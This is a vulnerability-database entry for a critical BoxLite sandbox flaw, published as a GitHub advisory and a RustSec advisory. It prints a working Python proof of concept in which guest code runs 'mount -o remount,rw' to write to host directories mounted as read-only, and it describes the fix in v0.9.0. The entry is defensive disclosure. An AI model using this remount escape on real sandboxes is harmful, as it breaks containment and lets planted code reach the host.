Vulnerability-Lookup

GHSA-G6WW-W5J2-R7X3

Vulnerability from github – Published: 2026-05-21 21:52 – Updated: 2026-05-21 21:52

Summary

BoxLite: Permission Bypass Allows Modification of Read-Only Files

Details

Summary

Boxlite is a sandbox service that allows users to create lightweight virtual machines (Boxes) and launch OCI containers within them to run untrusted code.

One of the core security features claimed by Boxlite is the ability to mount host directories in read-only mode (read_only=True) into the VM via the virtiofs protocol (a host-guest shared filesystem protocol designed specifically for virtual machines), so that untrusted code can only read but not modify host data. Since the underlying function of the lightweight VM library libkrun used by Boxlite does not support mounting in read-only mode, Boxlite chooses to implement read-only by adding the MS_RDONLY flag when mounting the directory after the VM starts.

However, because Boxlite does not restrict the kernel capabilities available inside the container, malicious code can remount the directory in rw mode, thereby gaining write access to that directory. This allows malicious code to perform arbitrary write operations on directories that should be read-only.

In typical usage scenarios of Boxlite, an attacker can leverage this vulnerability to gain code execution capability on the host. For example, in AI Agent scenarios, user code, virtual environments, credentials, configuration files, and other content are often mounted in read-only mode into the container. Malicious code inside the sandbox can modify this information, such as planting malicious code, to gain code execution capability on the host, which may further introduce supply chain risks.

Details

User-Facing API Documents Read-Only Guarantee

File: boxlite/src/runtime/options.rs Function: VolumeSpec (line 223) Code:

/// Filesystem mount specification.
pub struct VolumeSpec {
    pub host_path: String,
    pub guest_path: String,
    pub read_only: bool,  // <-- operator sets this to restrict guest write access
}

Issue: The read_only field is documented (and in user-facing guides) as preventing the guest from writing to the host directory. The guarantee is "Agent can read but not write." This expectation is not met.

read_only Stored in FsShare — Passed to krun Without Enforcement

File: boxlite/src/vmm/krun/engine.rs Function: Krun::create() (line 334) Code:

for share in config.fs_shares.shares() {
    let path_str = share.host_path.to_str().ok_or_else(|| { ... })?;

    tracing::info!(
        "  {} → {} ({})",
        share.tag,
        share.host_path.display(),
        if share.read_only { "ro" } else { "rw" }  // Logged but NOT passed to krun
    );
    ctx.add_virtiofs(&share.tag, path_str)?;  // <-- read_only silently dropped
}

Issue: share.read_only is logged as "ro" or "rw" but is never passed to add_virtiofs. The actual hypervisor call receives only tag and host path.

Hypervisor FFI Has No Read-Only Parameter

File: boxlite/src/vmm/krun/context.rs Function: add_virtiofs() (line 423) Code:

pub unsafe fn add_virtiofs(&self, mount_tag: &str, host_path: &str) -> BoxliteResult<()> {
    let host_path_c = CString::new(host_path)
        .map_err(|e| BoxliteError::Engine(format!("invalid host path: {e}")))?;
    let mount_tag_c = CString::new(mount_tag)
        .map_err(|e| BoxliteError::Engine(format!("invalid mount tag: {e}")))?;

    check_status("krun_add_virtiofs", unsafe {
        krun_add_virtiofs(self.ctx_id, mount_tag_c.as_ptr(), host_path_c.as_ptr())
        // No read_only parameter — libkrun exposes the share as read-write to the guest
    })
}

Issue: krun_add_virtiofs in the FFI (deps/libkrun-sys/src/lib.rs:35) takes only ctx_id, mount_tag, and host_path. There is no read-only flag. Libkrun exposes the virtiofs share to the guest with full read-write access at the device level.

Read-Only Enforcement Is Delegated to Guest Agent (Zone 0)

File: boxlite/src/volumes/guest_volume.rs Function: build_guest_mounts() (line 184) Code:

for entry in &self.fs_shares {
    let mount_point = entry.guest_path.as_deref().unwrap_or("");
    volumes.push(VolumeConfig::virtiofs(
        &entry.tag,
        mount_point,
        entry.read_only,       // <-- sent to guest agent as instruction
        entry.container_id.clone(),
    ));
}

Issue: The read_only flag is sent to the guest agent via gRPC as a mount instruction. The guest agent is expected to pass -o ro to the mount syscall. But the guest runs Zone 0 code — untrusted, assumed malicious. A compromised or malicious guest simply ignores this instruction.

FFI Declaration Confirms No Read-Only Variant Exists

File: boxlite/deps/libkrun-sys/src/lib.rs Function: krun_add_virtiofs extern declaration (line 35) Code:

extern "C" {
    pub fn krun_add_virtiofs(
        ctx_id: u32,
        mount_tag: *const c_char,
        host_path: *const c_char,
    ) -> i32;
    // No krun_add_virtiofs_ro or equivalent declared
}

Issue: There is no alternative read-only virtiofs FFI function declared. The entire codebase has no krun_add_virtiofs_ro or read-only parameter variant. Enforcement at the hypervisor level does not exist.

OCI Spec Builder Grants All Capabilities

File: guest/src/container/capabilities.rs Function: all_capabilities() (line 19) Code:

rust pub fn all_capabilities() -> HashSet<Capability> { [ // ... Capability::SysModule, // 16: load/unload kernel modules Capability::SysRawio, // 17: perform I/O port operations Capability::SysAdmin, // 21: various admin operations Capability::NetAdmin, // 12: network administration Capability::NetRaw, // 13: use RAW/PACKET sockets Capability::MacOverride, // 32: override MAC Capability::Bpf, // 39: BPF operations // ... all 41 capabilities ] .into_iter() .collect() }

Issue: Returns all 41 capabilities including the most dangerous ones, like Capability::SysAdmin. The function comment itself says "maximum compatibility but reduced security isolation."

PoC

Install Boxlite following the official tutorial.
Run the following Python script:

```python import asyncio import os import tempfile import sys from boxlite import Boxlite, BoxOptions

async def run(box, cmd): """Run shell command via native box.exec API.""" execution = await box.exec("sh", ["-c", cmd], None) stdout_stream = execution.stdout() stderr_stream = execution.stderr()

   stdout_lines, stderr_lines = [], []

   async def read_stdout():
       async for line in stdout_stream:
           stdout_lines.append(line if isinstance(line, str) else line.decode('utf-8', errors='replace'))

   async def read_stderr():
       async for line in stderr_stream:
           stderr_lines.append(line if isinstance(line, str) else line.decode('utf-8', errors='replace'))

   await asyncio.gather(read_stdout(), read_stderr())
   result = await execution.wait()

   return {
       'exit_code': result.exit_code,
       'stdout': ''.join(stdout_lines),
       'stderr': ''.join(stderr_lines),
   }

async def main(): # Step 1: Set up host directory with a read-only file host_dir = tempfile.mkdtemp(prefix="virtiofs_ro_poc_") ro_file = os.path.join(host_dir, "read_only.txt")

   with open(ro_file, "w") as f:
       f.write("original content\n")

   print(f"[+] Step 1: Host directory created: {host_dir}")
   print(f"    read_only.txt: {open(ro_file).read().strip()}")
   print()

   guest_mount = "/mnt/sensitive"
   print(f"[+] Step 2: Launching BoxLite VM with:")
   print(f"    volumes=[('{host_dir}', '{guest_mount}', True)]  # read_only=True")
   print()

   try:
       runtime = Boxlite.default()
       opts = BoxOptions(
           image="alpine:latest",
           volumes=[(host_dir, guest_mount, True)],  # <-- read_only=True
           memory_mib=512,
           cpus=1,
           auto_remove=True,
       )

       box = await runtime.create(opts)
       async with box:
           print("[+] Step 3: VM booted. Checking virtiofs mount state...")
           r = await run(box, f"cat /proc/mounts | grep sensitive")
           print(f"    /proc/mounts: {r['stdout'].strip()}")
           print()

           print("[+] Step 4: Testing write protection (initial state)...")
           r2 = await run(box, f"echo 'modified content' > {guest_mount}/read_only.txt 2>&1; echo write_exit:$?")
           out = r2['stdout'].strip()
           print(f"    Write attempt: {out}")
           if "Read-only" in out or "read-only" in out:
               print(f"    [OK] Initially blocked - client-side MS_RDONLY is active")
           print()

           print("[!!!] Step 5: ATTACK - Bypassing read-only via remount...")
           r3 = await run(box, f"mount -o remount,rw {guest_mount} 2>&1; echo remount_exit:$?")
           print(f"    Remount result: {r3['stdout'].strip()}")
           r4 = await run(box, f"cat /proc/mounts | grep sensitive")
           print(f"    Mount flags after: {r4['stdout'].strip()}")
           print()

           print("[!!!] Step 6: Writing to 'read-only' mount after bypass...")
           r5 = await run(box, f"echo 'modified content' > {guest_mount}/read_only.txt 2>&1; echo write_exit:$?")
           print(f"    Write result: {r5['stdout'].strip()}")
           r6 = await run(box, f"cat {guest_mount}/read_only.txt")
           print(f"    File content inside guest: {r6['stdout'].strip()}")
           print()

       print("[+] Step 7: HOST VERIFICATION")
       content = open(ro_file).read().strip()
       print(f"    read_only.txt on host: {content}")
       print()

       print("FINAL RESULT:")
       print()
       if content == "modified content":
           print("  [!!!] VULNERABILITY CONFIRMED - EXPLOITABLE")
       else:
           print("  [?] Bypass did not produce host-side writes.")

   except Exception as e:
       print(f"[-] Error: {e}")
       import traceback
       traceback.print_exc()
   finally:
       import shutil
       try:
           shutil.rmtree(host_dir)
           print(f"\n[+] Cleanup: removed {host_dir}")
       except:
           pass

asyncio.run(main()) ```

This script mounts a directory in read-only mode into the sandbox and attempts to exploit the vulnerability to modify a file in that directory. Expected output:

``` $ python poc.py [+] Step 1: Host directory created: /tmp/virtiofs_ro_poc_93fdis21 read_only.txt: original content

[+] Step 2: Launching BoxLite VM with: volumes=[('/tmp/virtiofs_ro_poc_93fdis21', '/mnt/sensitive', True)] # read_only=True

[+] Step 3: VM booted. Checking virtiofs mount state... /proc/mounts: uservol0 /mnt/sensitive virtiofs ro,relatime 0 0

[+] Step 4: Testing write protection (initial state)... Write attempt: write_exit:1

[!!!] Step 5: ATTACK - Bypassing read-only via remount... Remount result: remount_exit:0 Mount flags after: uservol0 /mnt/sensitive virtiofs rw,relatime 0 0

[!!!] Step 6: Writing to 'read-only' mount after bypass... Write result: write_exit:0 File content inside guest: modified content

[+] Step 7: HOST VERIFICATION read_only.txt on host: modified content

FINAL RESULT:

 [!!!] VULNERABILITY CONFIRMED - EXPLOITABLE

[+] Cleanup: removed /tmp/virtiofs_ro_poc_93fdis21 ```

Impact

Malicious code can perform arbitrary write operations on directories that should be read-only.

Score

Severity: Critical, Score: 10.0, rationale as follows:

AV:N — Malicious code can be transmitted through networks, such as code written by large language models.
AC:L — No special conditions or race conditions are required. The attacker simply executes a mount -o remount,rw command inside the container. CAP_SYS_ADMIN is granted by default, and the attack is deterministic and trivially reproducible.
PR:N — The attacker needs the ability to execute arbitrary code inside the Boxlite sandbox, which is the fundamental use case of Boxlite (running untrusted code).
UI:N — No user interaction is required. Malicious code inside the container can autonomously exploit this vulnerability without any action from the host operator.
S:C — The vulnerability allows the attacker to cross the sandbox trust boundary and impact the host system. The vulnerable component is the Boxlite sandbox isolation mechanism, but the impacted component is the host filesystem.
C:H — With write access to host directories, the attacker can plant malicious code that will be executed by the host, leading to full compromise of sensitive host data including credentials, API keys, user code, and configuration files mounted into the container.
I:H — The attacker gains full write access to host directories explicitly intended to be read-only, allowing arbitrary modification of host files including planting backdoors, modifying virtual environments for supply chain attacks, and altering credentials and configuration files.
A:N — The vulnerability primarily enables unauthorized write access. The host system and Boxlite service continue to function; no distinct availability impact mechanism exists beyond secondary consequences of write access.

Credit

This vulnerability was discovered by:

XlabAI Team of Tencent Xuanwu Lab
Atuin Automated Vulnerability Discovery Engine

CVE and credit are preferred.

If there are any questions regarding the vulnerability details, please feel free to reach out to us for further discussion. Our email address is xlabai@tencent.com.

Note

Note that BoxLite follows the industry-standard 90+30 disclosure policy (Reference: https://googleprojectzero.blogspot.com/p/vulnerability-disclosure-policy.html). This means that BoxLite reserves the right to disclose the details of the vulnerability 30 days after the fix has been implemented.

Resolution

Fixed in v0.9.0 by PR #454 (commit 2c26968e), released 2026-04-29, with defense-in-depth across three layers:

Hypervisor-level read-only enforcement. virtio-fs shares are now created via krun_add_virtiofs3 (libkrun v1.18.0) with the read_only flag passed through, so the share is read-only at the virtio-fs device — before any request reaches the guest kernel. A malicious guest mount -o remount,rw can no longer reach host data even if it regained CAP_SYS_ADMIN.
Capability restriction. Containers now receive the 14 Docker-default capabilities, explicitly excluding CAP_SYS_ADMIN (and CAP_NET_ADMIN, CAP_SYS_MODULE, CAP_SYS_RAWIO, CAP_MAC_OVERRIDE), so the remount in the PoC fails with EPERM.
TSI network isolation. When the network is disabled, the implicit vsock is replaced with an explicit vsock with no TSI features, closing a related guest→host socket-forwarding path.

Regression coverage: src/boxlite/tests/security_enforcement.rs (Rust core) and sdks/python/tests/test_readonly_volume_remount.py (Python SDK) both replay the PoC remount attack and assert it fails.

Remediation: upgrade to boxlite 0.9.0 or later (all SDKs: PyPI boxlite, npm @boxlite-ai/boxlite, Go module github.com/boxlite-ai/boxlite/sdks/go, crates.io boxlite / boxlite-cli). There is no workaround for affected versions; upgrade is required.

Severity

10.0 (Critical)


                  
                    CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "boxlite"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.9.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "npm",
        "name": "@boxlite-ai/boxlite"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.9.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/boxlite-ai/boxlite/sdks/go"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.9.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "crates.io",
        "name": "boxlite"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.9.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "crates.io",
        "name": "boxlite-cli"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.9.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-46695"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-284"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-21T21:52:51Z",
    "nvd_published_at": null,
    "severity": "CRITICAL"
  },
  "details": "#### Summary\n\nBoxlite is a sandbox service that allows users to create lightweight virtual machines (Boxes) and launch OCI containers within them to run untrusted code.\n\nOne of the core security features claimed by Boxlite is the ability to mount host directories in read-only mode (read_only=True) into the VM via the virtiofs protocol (a host-guest shared filesystem protocol designed specifically for virtual machines), so that untrusted code can only read but not modify host data. Since the underlying function of the lightweight VM library libkrun used by Boxlite does not support mounting in read-only mode, Boxlite chooses to implement read-only by adding the MS_RDONLY flag when mounting the directory after the VM starts.\n\nHowever, because Boxlite does not restrict the kernel capabilities available inside the container, malicious code can remount the directory in rw mode, thereby gaining write access to that directory. This allows malicious code to perform arbitrary write operations on directories that should be read-only.\n\nIn typical usage scenarios of Boxlite, an attacker can leverage this vulnerability to gain code execution capability on the host. For example, in AI Agent scenarios, user code, virtual environments, credentials, configuration files, and other content are often mounted in read-only mode into the container. Malicious code inside the sandbox can modify this information, such as planting malicious code, to gain code execution capability on the host, which may further introduce supply chain risks.\n\n\n\n#### Details\n\n1. User-Facing API Documents Read-Only Guarantee\n\n**File:** `boxlite/src/runtime/options.rs` **Function:** `VolumeSpec` (line 223) **Code:**\n\n```rust\n/// Filesystem mount specification.\npub struct VolumeSpec {\n    pub host_path: String,\n    pub guest_path: String,\n    pub read_only: bool,  // \u003c-- operator sets this to restrict guest write access\n}\n```\n\n**Issue:** The `read_only` field is documented (and in user-facing guides) as preventing the guest from writing to the host directory. The guarantee is \"Agent can read but not write.\" This expectation is not met.\n\n2. read_only Stored in FsShare \u2014 Passed to krun Without Enforcement\n\n**File:** `boxlite/src/vmm/krun/engine.rs` **Function:** `Krun::create()` (line 334) **Code:**\n\n```rust\nfor share in config.fs_shares.shares() {\n    let path_str = share.host_path.to_str().ok_or_else(|| { ... })?;\n\n    tracing::info!(\n        \"  {} \u2192 {} ({})\",\n        share.tag,\n        share.host_path.display(),\n        if share.read_only { \"ro\" } else { \"rw\" }  // Logged but NOT passed to krun\n    );\n    ctx.add_virtiofs(\u0026share.tag, path_str)?;  // \u003c-- read_only silently dropped\n}\n```\n\n**Issue:** `share.read_only` is logged as \"ro\" or \"rw\" but is never passed to `add_virtiofs`. The actual hypervisor call receives only tag and host path.\n\n3. Hypervisor FFI Has No Read-Only Parameter\n\n**File:** `boxlite/src/vmm/krun/context.rs` **Function:** `add_virtiofs()` (line 423) **Code:**\n\n```rust\npub unsafe fn add_virtiofs(\u0026self, mount_tag: \u0026str, host_path: \u0026str) -\u003e BoxliteResult\u003c()\u003e {\n    let host_path_c = CString::new(host_path)\n        .map_err(|e| BoxliteError::Engine(format!(\"invalid host path: {e}\")))?;\n    let mount_tag_c = CString::new(mount_tag)\n        .map_err(|e| BoxliteError::Engine(format!(\"invalid mount tag: {e}\")))?;\n\n    check_status(\"krun_add_virtiofs\", unsafe {\n        krun_add_virtiofs(self.ctx_id, mount_tag_c.as_ptr(), host_path_c.as_ptr())\n        // No read_only parameter \u2014 libkrun exposes the share as read-write to the guest\n    })\n}\n```\n\n**Issue:** `krun_add_virtiofs` in the FFI (`deps/libkrun-sys/src/lib.rs:35`) takes only `ctx_id`, `mount_tag`, and `host_path`. There is no read-only flag. Libkrun exposes the virtiofs share to the guest with full read-write access at the device level.\n\n4. Read-Only Enforcement Is Delegated to Guest Agent (Zone 0)\n\n**File:** `boxlite/src/volumes/guest_volume.rs` **Function:** `build_guest_mounts()` (line 184) **Code:**\n\n```rust\nfor entry in \u0026self.fs_shares {\n    let mount_point = entry.guest_path.as_deref().unwrap_or(\"\");\n    volumes.push(VolumeConfig::virtiofs(\n        \u0026entry.tag,\n        mount_point,\n        entry.read_only,       // \u003c-- sent to guest agent as instruction\n        entry.container_id.clone(),\n    ));\n}\n```\n\n**Issue:** The `read_only` flag is sent to the guest agent via gRPC as a mount instruction. The guest agent is expected to pass `-o ro` to the mount syscall. But the guest runs Zone 0 code \u2014 untrusted, assumed malicious. A compromised or malicious guest simply ignores this instruction.\n\n5. FFI Declaration Confirms No Read-Only Variant Exists\n\n**File:** `boxlite/deps/libkrun-sys/src/lib.rs` **Function:** `krun_add_virtiofs` extern declaration (line 35) **Code:**\n\n```rust\nextern \"C\" {\n    pub fn krun_add_virtiofs(\n        ctx_id: u32,\n        mount_tag: *const c_char,\n        host_path: *const c_char,\n    ) -\u003e i32;\n    // No krun_add_virtiofs_ro or equivalent declared\n}\n```\n\n**Issue:** There is no alternative read-only virtiofs FFI function declared. The entire codebase has no `krun_add_virtiofs_ro` or read-only parameter variant. Enforcement at the hypervisor level does not exist.\n\n6. OCI Spec Builder Grants All Capabilities\n\n **File:** `guest/src/container/capabilities.rs` **Function:** `all_capabilities()` (line 19) **Code:**\n\n ```rust\n pub fn all_capabilities() -\u003e HashSet\u003cCapability\u003e {\n     [\n         // ...\n         Capability::SysModule,    // 16: load/unload kernel modules\n         Capability::SysRawio,     // 17: perform I/O port operations\n         Capability::SysAdmin,     // 21: various admin operations\n         Capability::NetAdmin,     // 12: network administration\n         Capability::NetRaw,       // 13: use RAW/PACKET sockets\n         Capability::MacOverride,  // 32: override MAC\n         Capability::Bpf,          // 39: BPF operations\n         // ... all 41 capabilities\n     ]\n     .into_iter()\n     .collect()\n }\n ```\n\n**Issue:** Returns all 41 capabilities including the most dangerous ones, like `Capability::SysAdmin`. The function comment itself says \"maximum compatibility but reduced security isolation.\"\n\n\n\n#### PoC\n\n1. Install Boxlite following the official tutorial.\n\n2. Run the following Python script:\n\n   ```python\n   import asyncio\n   import os\n   import tempfile\n   import sys\n   from boxlite import Boxlite, BoxOptions\n   \n   \n   async def run(box, cmd):\n       \"\"\"Run shell command via native box.exec API.\"\"\"\n       execution = await box.exec(\"sh\", [\"-c\", cmd], None)\n       stdout_stream = execution.stdout()\n       stderr_stream = execution.stderr()\n   \n       stdout_lines, stderr_lines = [], []\n   \n       async def read_stdout():\n           async for line in stdout_stream:\n               stdout_lines.append(line if isinstance(line, str) else line.decode(\u0027utf-8\u0027, errors=\u0027replace\u0027))\n   \n       async def read_stderr():\n           async for line in stderr_stream:\n               stderr_lines.append(line if isinstance(line, str) else line.decode(\u0027utf-8\u0027, errors=\u0027replace\u0027))\n   \n       await asyncio.gather(read_stdout(), read_stderr())\n       result = await execution.wait()\n   \n       return {\n           \u0027exit_code\u0027: result.exit_code,\n           \u0027stdout\u0027: \u0027\u0027.join(stdout_lines),\n           \u0027stderr\u0027: \u0027\u0027.join(stderr_lines),\n       }\n   \n   async def main():\n       # Step 1: Set up host directory with a read-only file\n       host_dir = tempfile.mkdtemp(prefix=\"virtiofs_ro_poc_\")\n       ro_file = os.path.join(host_dir, \"read_only.txt\")\n   \n       with open(ro_file, \"w\") as f:\n           f.write(\"original content\\n\")\n   \n       print(f\"[+] Step 1: Host directory created: {host_dir}\")\n       print(f\"    read_only.txt: {open(ro_file).read().strip()}\")\n       print()\n   \n       guest_mount = \"/mnt/sensitive\"\n       print(f\"[+] Step 2: Launching BoxLite VM with:\")\n       print(f\"    volumes=[(\u0027{host_dir}\u0027, \u0027{guest_mount}\u0027, True)]  # read_only=True\")\n       print()\n   \n       try:\n           runtime = Boxlite.default()\n           opts = BoxOptions(\n               image=\"alpine:latest\",\n               volumes=[(host_dir, guest_mount, True)],  # \u003c-- read_only=True\n               memory_mib=512,\n               cpus=1,\n               auto_remove=True,\n           )\n   \n           box = await runtime.create(opts)\n           async with box:\n               print(\"[+] Step 3: VM booted. Checking virtiofs mount state...\")\n               r = await run(box, f\"cat /proc/mounts | grep sensitive\")\n               print(f\"    /proc/mounts: {r[\u0027stdout\u0027].strip()}\")\n               print()\n   \n               print(\"[+] Step 4: Testing write protection (initial state)...\")\n               r2 = await run(box, f\"echo \u0027modified content\u0027 \u003e {guest_mount}/read_only.txt 2\u003e\u00261; echo write_exit:$?\")\n               out = r2[\u0027stdout\u0027].strip()\n               print(f\"    Write attempt: {out}\")\n               if \"Read-only\" in out or \"read-only\" in out:\n                   print(f\"    [OK] Initially blocked - client-side MS_RDONLY is active\")\n               print()\n   \n               print(\"[!!!] Step 5: ATTACK - Bypassing read-only via remount...\")\n               r3 = await run(box, f\"mount -o remount,rw {guest_mount} 2\u003e\u00261; echo remount_exit:$?\")\n               print(f\"    Remount result: {r3[\u0027stdout\u0027].strip()}\")\n               r4 = await run(box, f\"cat /proc/mounts | grep sensitive\")\n               print(f\"    Mount flags after: {r4[\u0027stdout\u0027].strip()}\")\n               print()\n   \n               print(\"[!!!] Step 6: Writing to \u0027read-only\u0027 mount after bypass...\")\n               r5 = await run(box, f\"echo \u0027modified content\u0027 \u003e {guest_mount}/read_only.txt 2\u003e\u00261; echo write_exit:$?\")\n               print(f\"    Write result: {r5[\u0027stdout\u0027].strip()}\")\n               r6 = await run(box, f\"cat {guest_mount}/read_only.txt\")\n               print(f\"    File content inside guest: {r6[\u0027stdout\u0027].strip()}\")\n               print()\n   \n           print(\"[+] Step 7: HOST VERIFICATION\")\n           content = open(ro_file).read().strip()\n           print(f\"    read_only.txt on host: {content}\")\n           print()\n   \n           print(\"FINAL RESULT:\")\n           print()\n           if content == \"modified content\":\n               print(\"  [!!!] VULNERABILITY CONFIRMED - EXPLOITABLE\")\n           else:\n               print(\"  [?] Bypass did not produce host-side writes.\")\n   \n       except Exception as e:\n           print(f\"[-] Error: {e}\")\n           import traceback\n           traceback.print_exc()\n       finally:\n           import shutil\n           try:\n               shutil.rmtree(host_dir)\n               print(f\"\\n[+] Cleanup: removed {host_dir}\")\n           except:\n               pass\n   \n   asyncio.run(main())\n   ```\n\n   This script mounts a directory in read-only mode into the sandbox and attempts to exploit the vulnerability to modify a file in that directory. Expected output:\n\n   ```\n   $ python poc.py\n   [+] Step 1: Host directory created: /tmp/virtiofs_ro_poc_93fdis21\n       read_only.txt: original content\n   \n   [+] Step 2: Launching BoxLite VM with:\n       volumes=[(\u0027/tmp/virtiofs_ro_poc_93fdis21\u0027, \u0027/mnt/sensitive\u0027, True)]  # read_only=True\n   \n   [+] Step 3: VM booted. Checking virtiofs mount state...\n       /proc/mounts: uservol0 /mnt/sensitive virtiofs ro,relatime 0 0\n   \n   [+] Step 4: Testing write protection (initial state)...\n       Write attempt: write_exit:1\n   \n   [!!!] Step 5: ATTACK - Bypassing read-only via remount...\n       Remount result: remount_exit:0\n       Mount flags after: uservol0 /mnt/sensitive virtiofs rw,relatime 0 0\n   \n   [!!!] Step 6: Writing to \u0027read-only\u0027 mount after bypass...\n       Write result: write_exit:0\n       File content inside guest: modified content\n   \n   [+] Step 7: HOST VERIFICATION\n       read_only.txt on host: modified content\n   \n   FINAL RESULT:\n   \n     [!!!] VULNERABILITY CONFIRMED - EXPLOITABLE\n   \n   [+] Cleanup: removed /tmp/virtiofs_ro_poc_93fdis21\n   ```\n\n   \n\n\n\n#### Impact\n\nMalicious code can perform arbitrary write operations on directories that should be read-only.\n\nIn typical usage scenarios of Boxlite, an attacker can leverage this vulnerability to gain code execution capability on the host. For example, in AI Agent scenarios, user code, virtual environments, credentials, configuration files, and other content are often mounted in read-only mode into the container. Malicious code inside the sandbox can modify this information, such as planting malicious code, to gain code execution capability on the host, which may further introduce supply chain risks.\n\n\n\n#### Score\n\nSeverity: Critical, Score: 10.0, rationale as follows: \n\n- **AV:N** \u2014 Malicious code can be transmitted through networks, such as code written by large language models.\n- **AC:L** \u2014 No special conditions or race conditions are required. The attacker simply executes a `mount -o remount,rw` command inside the container. `CAP_SYS_ADMIN` is granted by default, and the attack is deterministic and trivially reproducible.\n- **PR:N** \u2014 The attacker needs the ability to execute arbitrary code inside the Boxlite sandbox, which is the fundamental use case of Boxlite (running untrusted code). \n- **UI:N** \u2014 No user interaction is required. Malicious code inside the container can autonomously exploit this vulnerability without any action from the host operator.\n- **S:C** \u2014 The vulnerability allows the attacker to cross the sandbox trust boundary and impact the host system. The vulnerable component is the Boxlite sandbox isolation mechanism, but the impacted component is the host filesystem.\n- **C:H** \u2014 With write access to host directories, the attacker can plant malicious code that will be executed by the host, leading to full compromise of sensitive host data including credentials, API keys, user code, and configuration files mounted into the container.\n- **I:H** \u2014 The attacker gains full write access to host directories explicitly intended to be read-only, allowing arbitrary modification of host files including planting backdoors, modifying virtual environments for supply chain attacks, and altering credentials and configuration files.\n- **A:N** \u2014 The vulnerability primarily enables unauthorized write access. The host system and Boxlite service continue to function; no distinct availability impact mechanism exists beyond secondary consequences of write access.\n\n\n\n#### Credit\n\nThis vulnerability was discovered by:\n\n- XlabAI Team of Tencent Xuanwu Lab\n- Atuin Automated Vulnerability Discovery Engine\n\nCVE and credit are preferred.\n\nIf there are any questions regarding the vulnerability details, please feel free to reach out to us for further discussion. Our email address is xlabai@tencent.com.\n\n\n\n#### Note\n\nNote that BoxLite follows the industry-standard **90+30 disclosure policy** (Reference: https://googleprojectzero.blogspot.com/p/vulnerability-disclosure-policy.html). This means that BoxLite reserves the right to disclose the details of the vulnerability 30 days after the fix has been implemented.\n\n#### Resolution\n\nFixed in **v0.9.0** by PR #454 (commit `2c26968e`), released 2026-04-29, with defense-in-depth across three layers:\n\n1. **Hypervisor-level read-only enforcement.** virtio-fs shares are now created via `krun_add_virtiofs3` (libkrun v1.18.0) with the `read_only` flag passed through, so the share is read-only at the virtio-fs device \u2014 before any request reaches the guest kernel. A malicious guest `mount -o remount,rw` can no longer reach host data even if it regained `CAP_SYS_ADMIN`.\n2. **Capability restriction.** Containers now receive the 14 Docker-default capabilities, explicitly excluding `CAP_SYS_ADMIN` (and `CAP_NET_ADMIN`, `CAP_SYS_MODULE`, `CAP_SYS_RAWIO`, `CAP_MAC_OVERRIDE`), so the remount in the PoC fails with `EPERM`.\n3. **TSI network isolation.** When the network is disabled, the implicit vsock is replaced with an explicit vsock with no TSI features, closing a related guest\u2192host socket-forwarding path.\n\nRegression coverage: `src/boxlite/tests/security_enforcement.rs` (Rust core) and `sdks/python/tests/test_readonly_volume_remount.py` (Python SDK) both replay the PoC remount attack and assert it fails.\n\n**Remediation:** upgrade to boxlite **0.9.0 or later** (all SDKs: PyPI `boxlite`, npm `@boxlite-ai/boxlite`, Go module `github.com/boxlite-ai/boxlite/sdks/go`, crates.io `boxlite` / `boxlite-cli`). There is no workaround for affected versions; upgrade is required.",
  "id": "GHSA-g6ww-w5j2-r7x3",
  "modified": "2026-05-21T21:52:51Z",
  "published": "2026-05-21T21:52:51Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/boxlite-ai/boxlite/security/advisories/GHSA-g6ww-w5j2-r7x3"
    },
    {
      "type": "WEB",
      "url": "https://github.com/boxlite-ai/boxlite/pull/454"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/boxlite-ai/boxlite"
    },
    {
      "type": "WEB",
      "url": "https://rustsec.org/advisories/RUSTSEC-2026-0147.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "BoxLite: Permission Bypass Allows Modification of Read-Only Files"
}

rustsec-2026-0147

Vulnerability from osv_rustsec

Published

2026-05-16 12:00

Modified

2026-05-20 09:41

Summary

Read-only volume remount bypass via guest CAP_SYS_ADMIN

Details

Affected versions of boxlite mount host directories shared via virtiofs as guest-side read-only by setting MS_RDONLY from the guest. Because the default guest capability set included CAP_SYS_ADMIN, untrusted code running inside a sandbox could execute mount -o remount,rw <path> to re-flag the share as read-write and then write through to the host filesystem — fully escaping the read-only contract boxlite advertised to callers.

The fix in v0.9.0 enforces read-only at the hypervisor level via krun_add_virtiofs3 (so the guest's MS_RDONLY is no longer the authoritative gate) and drops CAP_SYS_ADMIN from the default guest capability set (matching Docker's defaults).

This is a sandbox-escape bug: boxlite is a sandboxing runtime, so the read-only invariant is part of its security contract. CVSS rated 10.0 by the upstream advisory.

Severity

10.0 (Critical)


                    
                      CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

References

URL

Type

	https://crates.io/crates/boxlite	PACKAGE
	https://rustsec.org/advisories/RUSTSEC-2026-0147.html	ADVISORY
	https://github.com/boxlite-ai/boxlite/security/ad…	ADVISORY
	https://github.com/boxlite-ai/boxlite/pull/454	WEB

JSON

To clipboard

{
  "affected": [
    {
      "database_specific": {
        "categories": [
          "privilege-escalation"
        ],
        "cvss": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
        "informational": null
      },
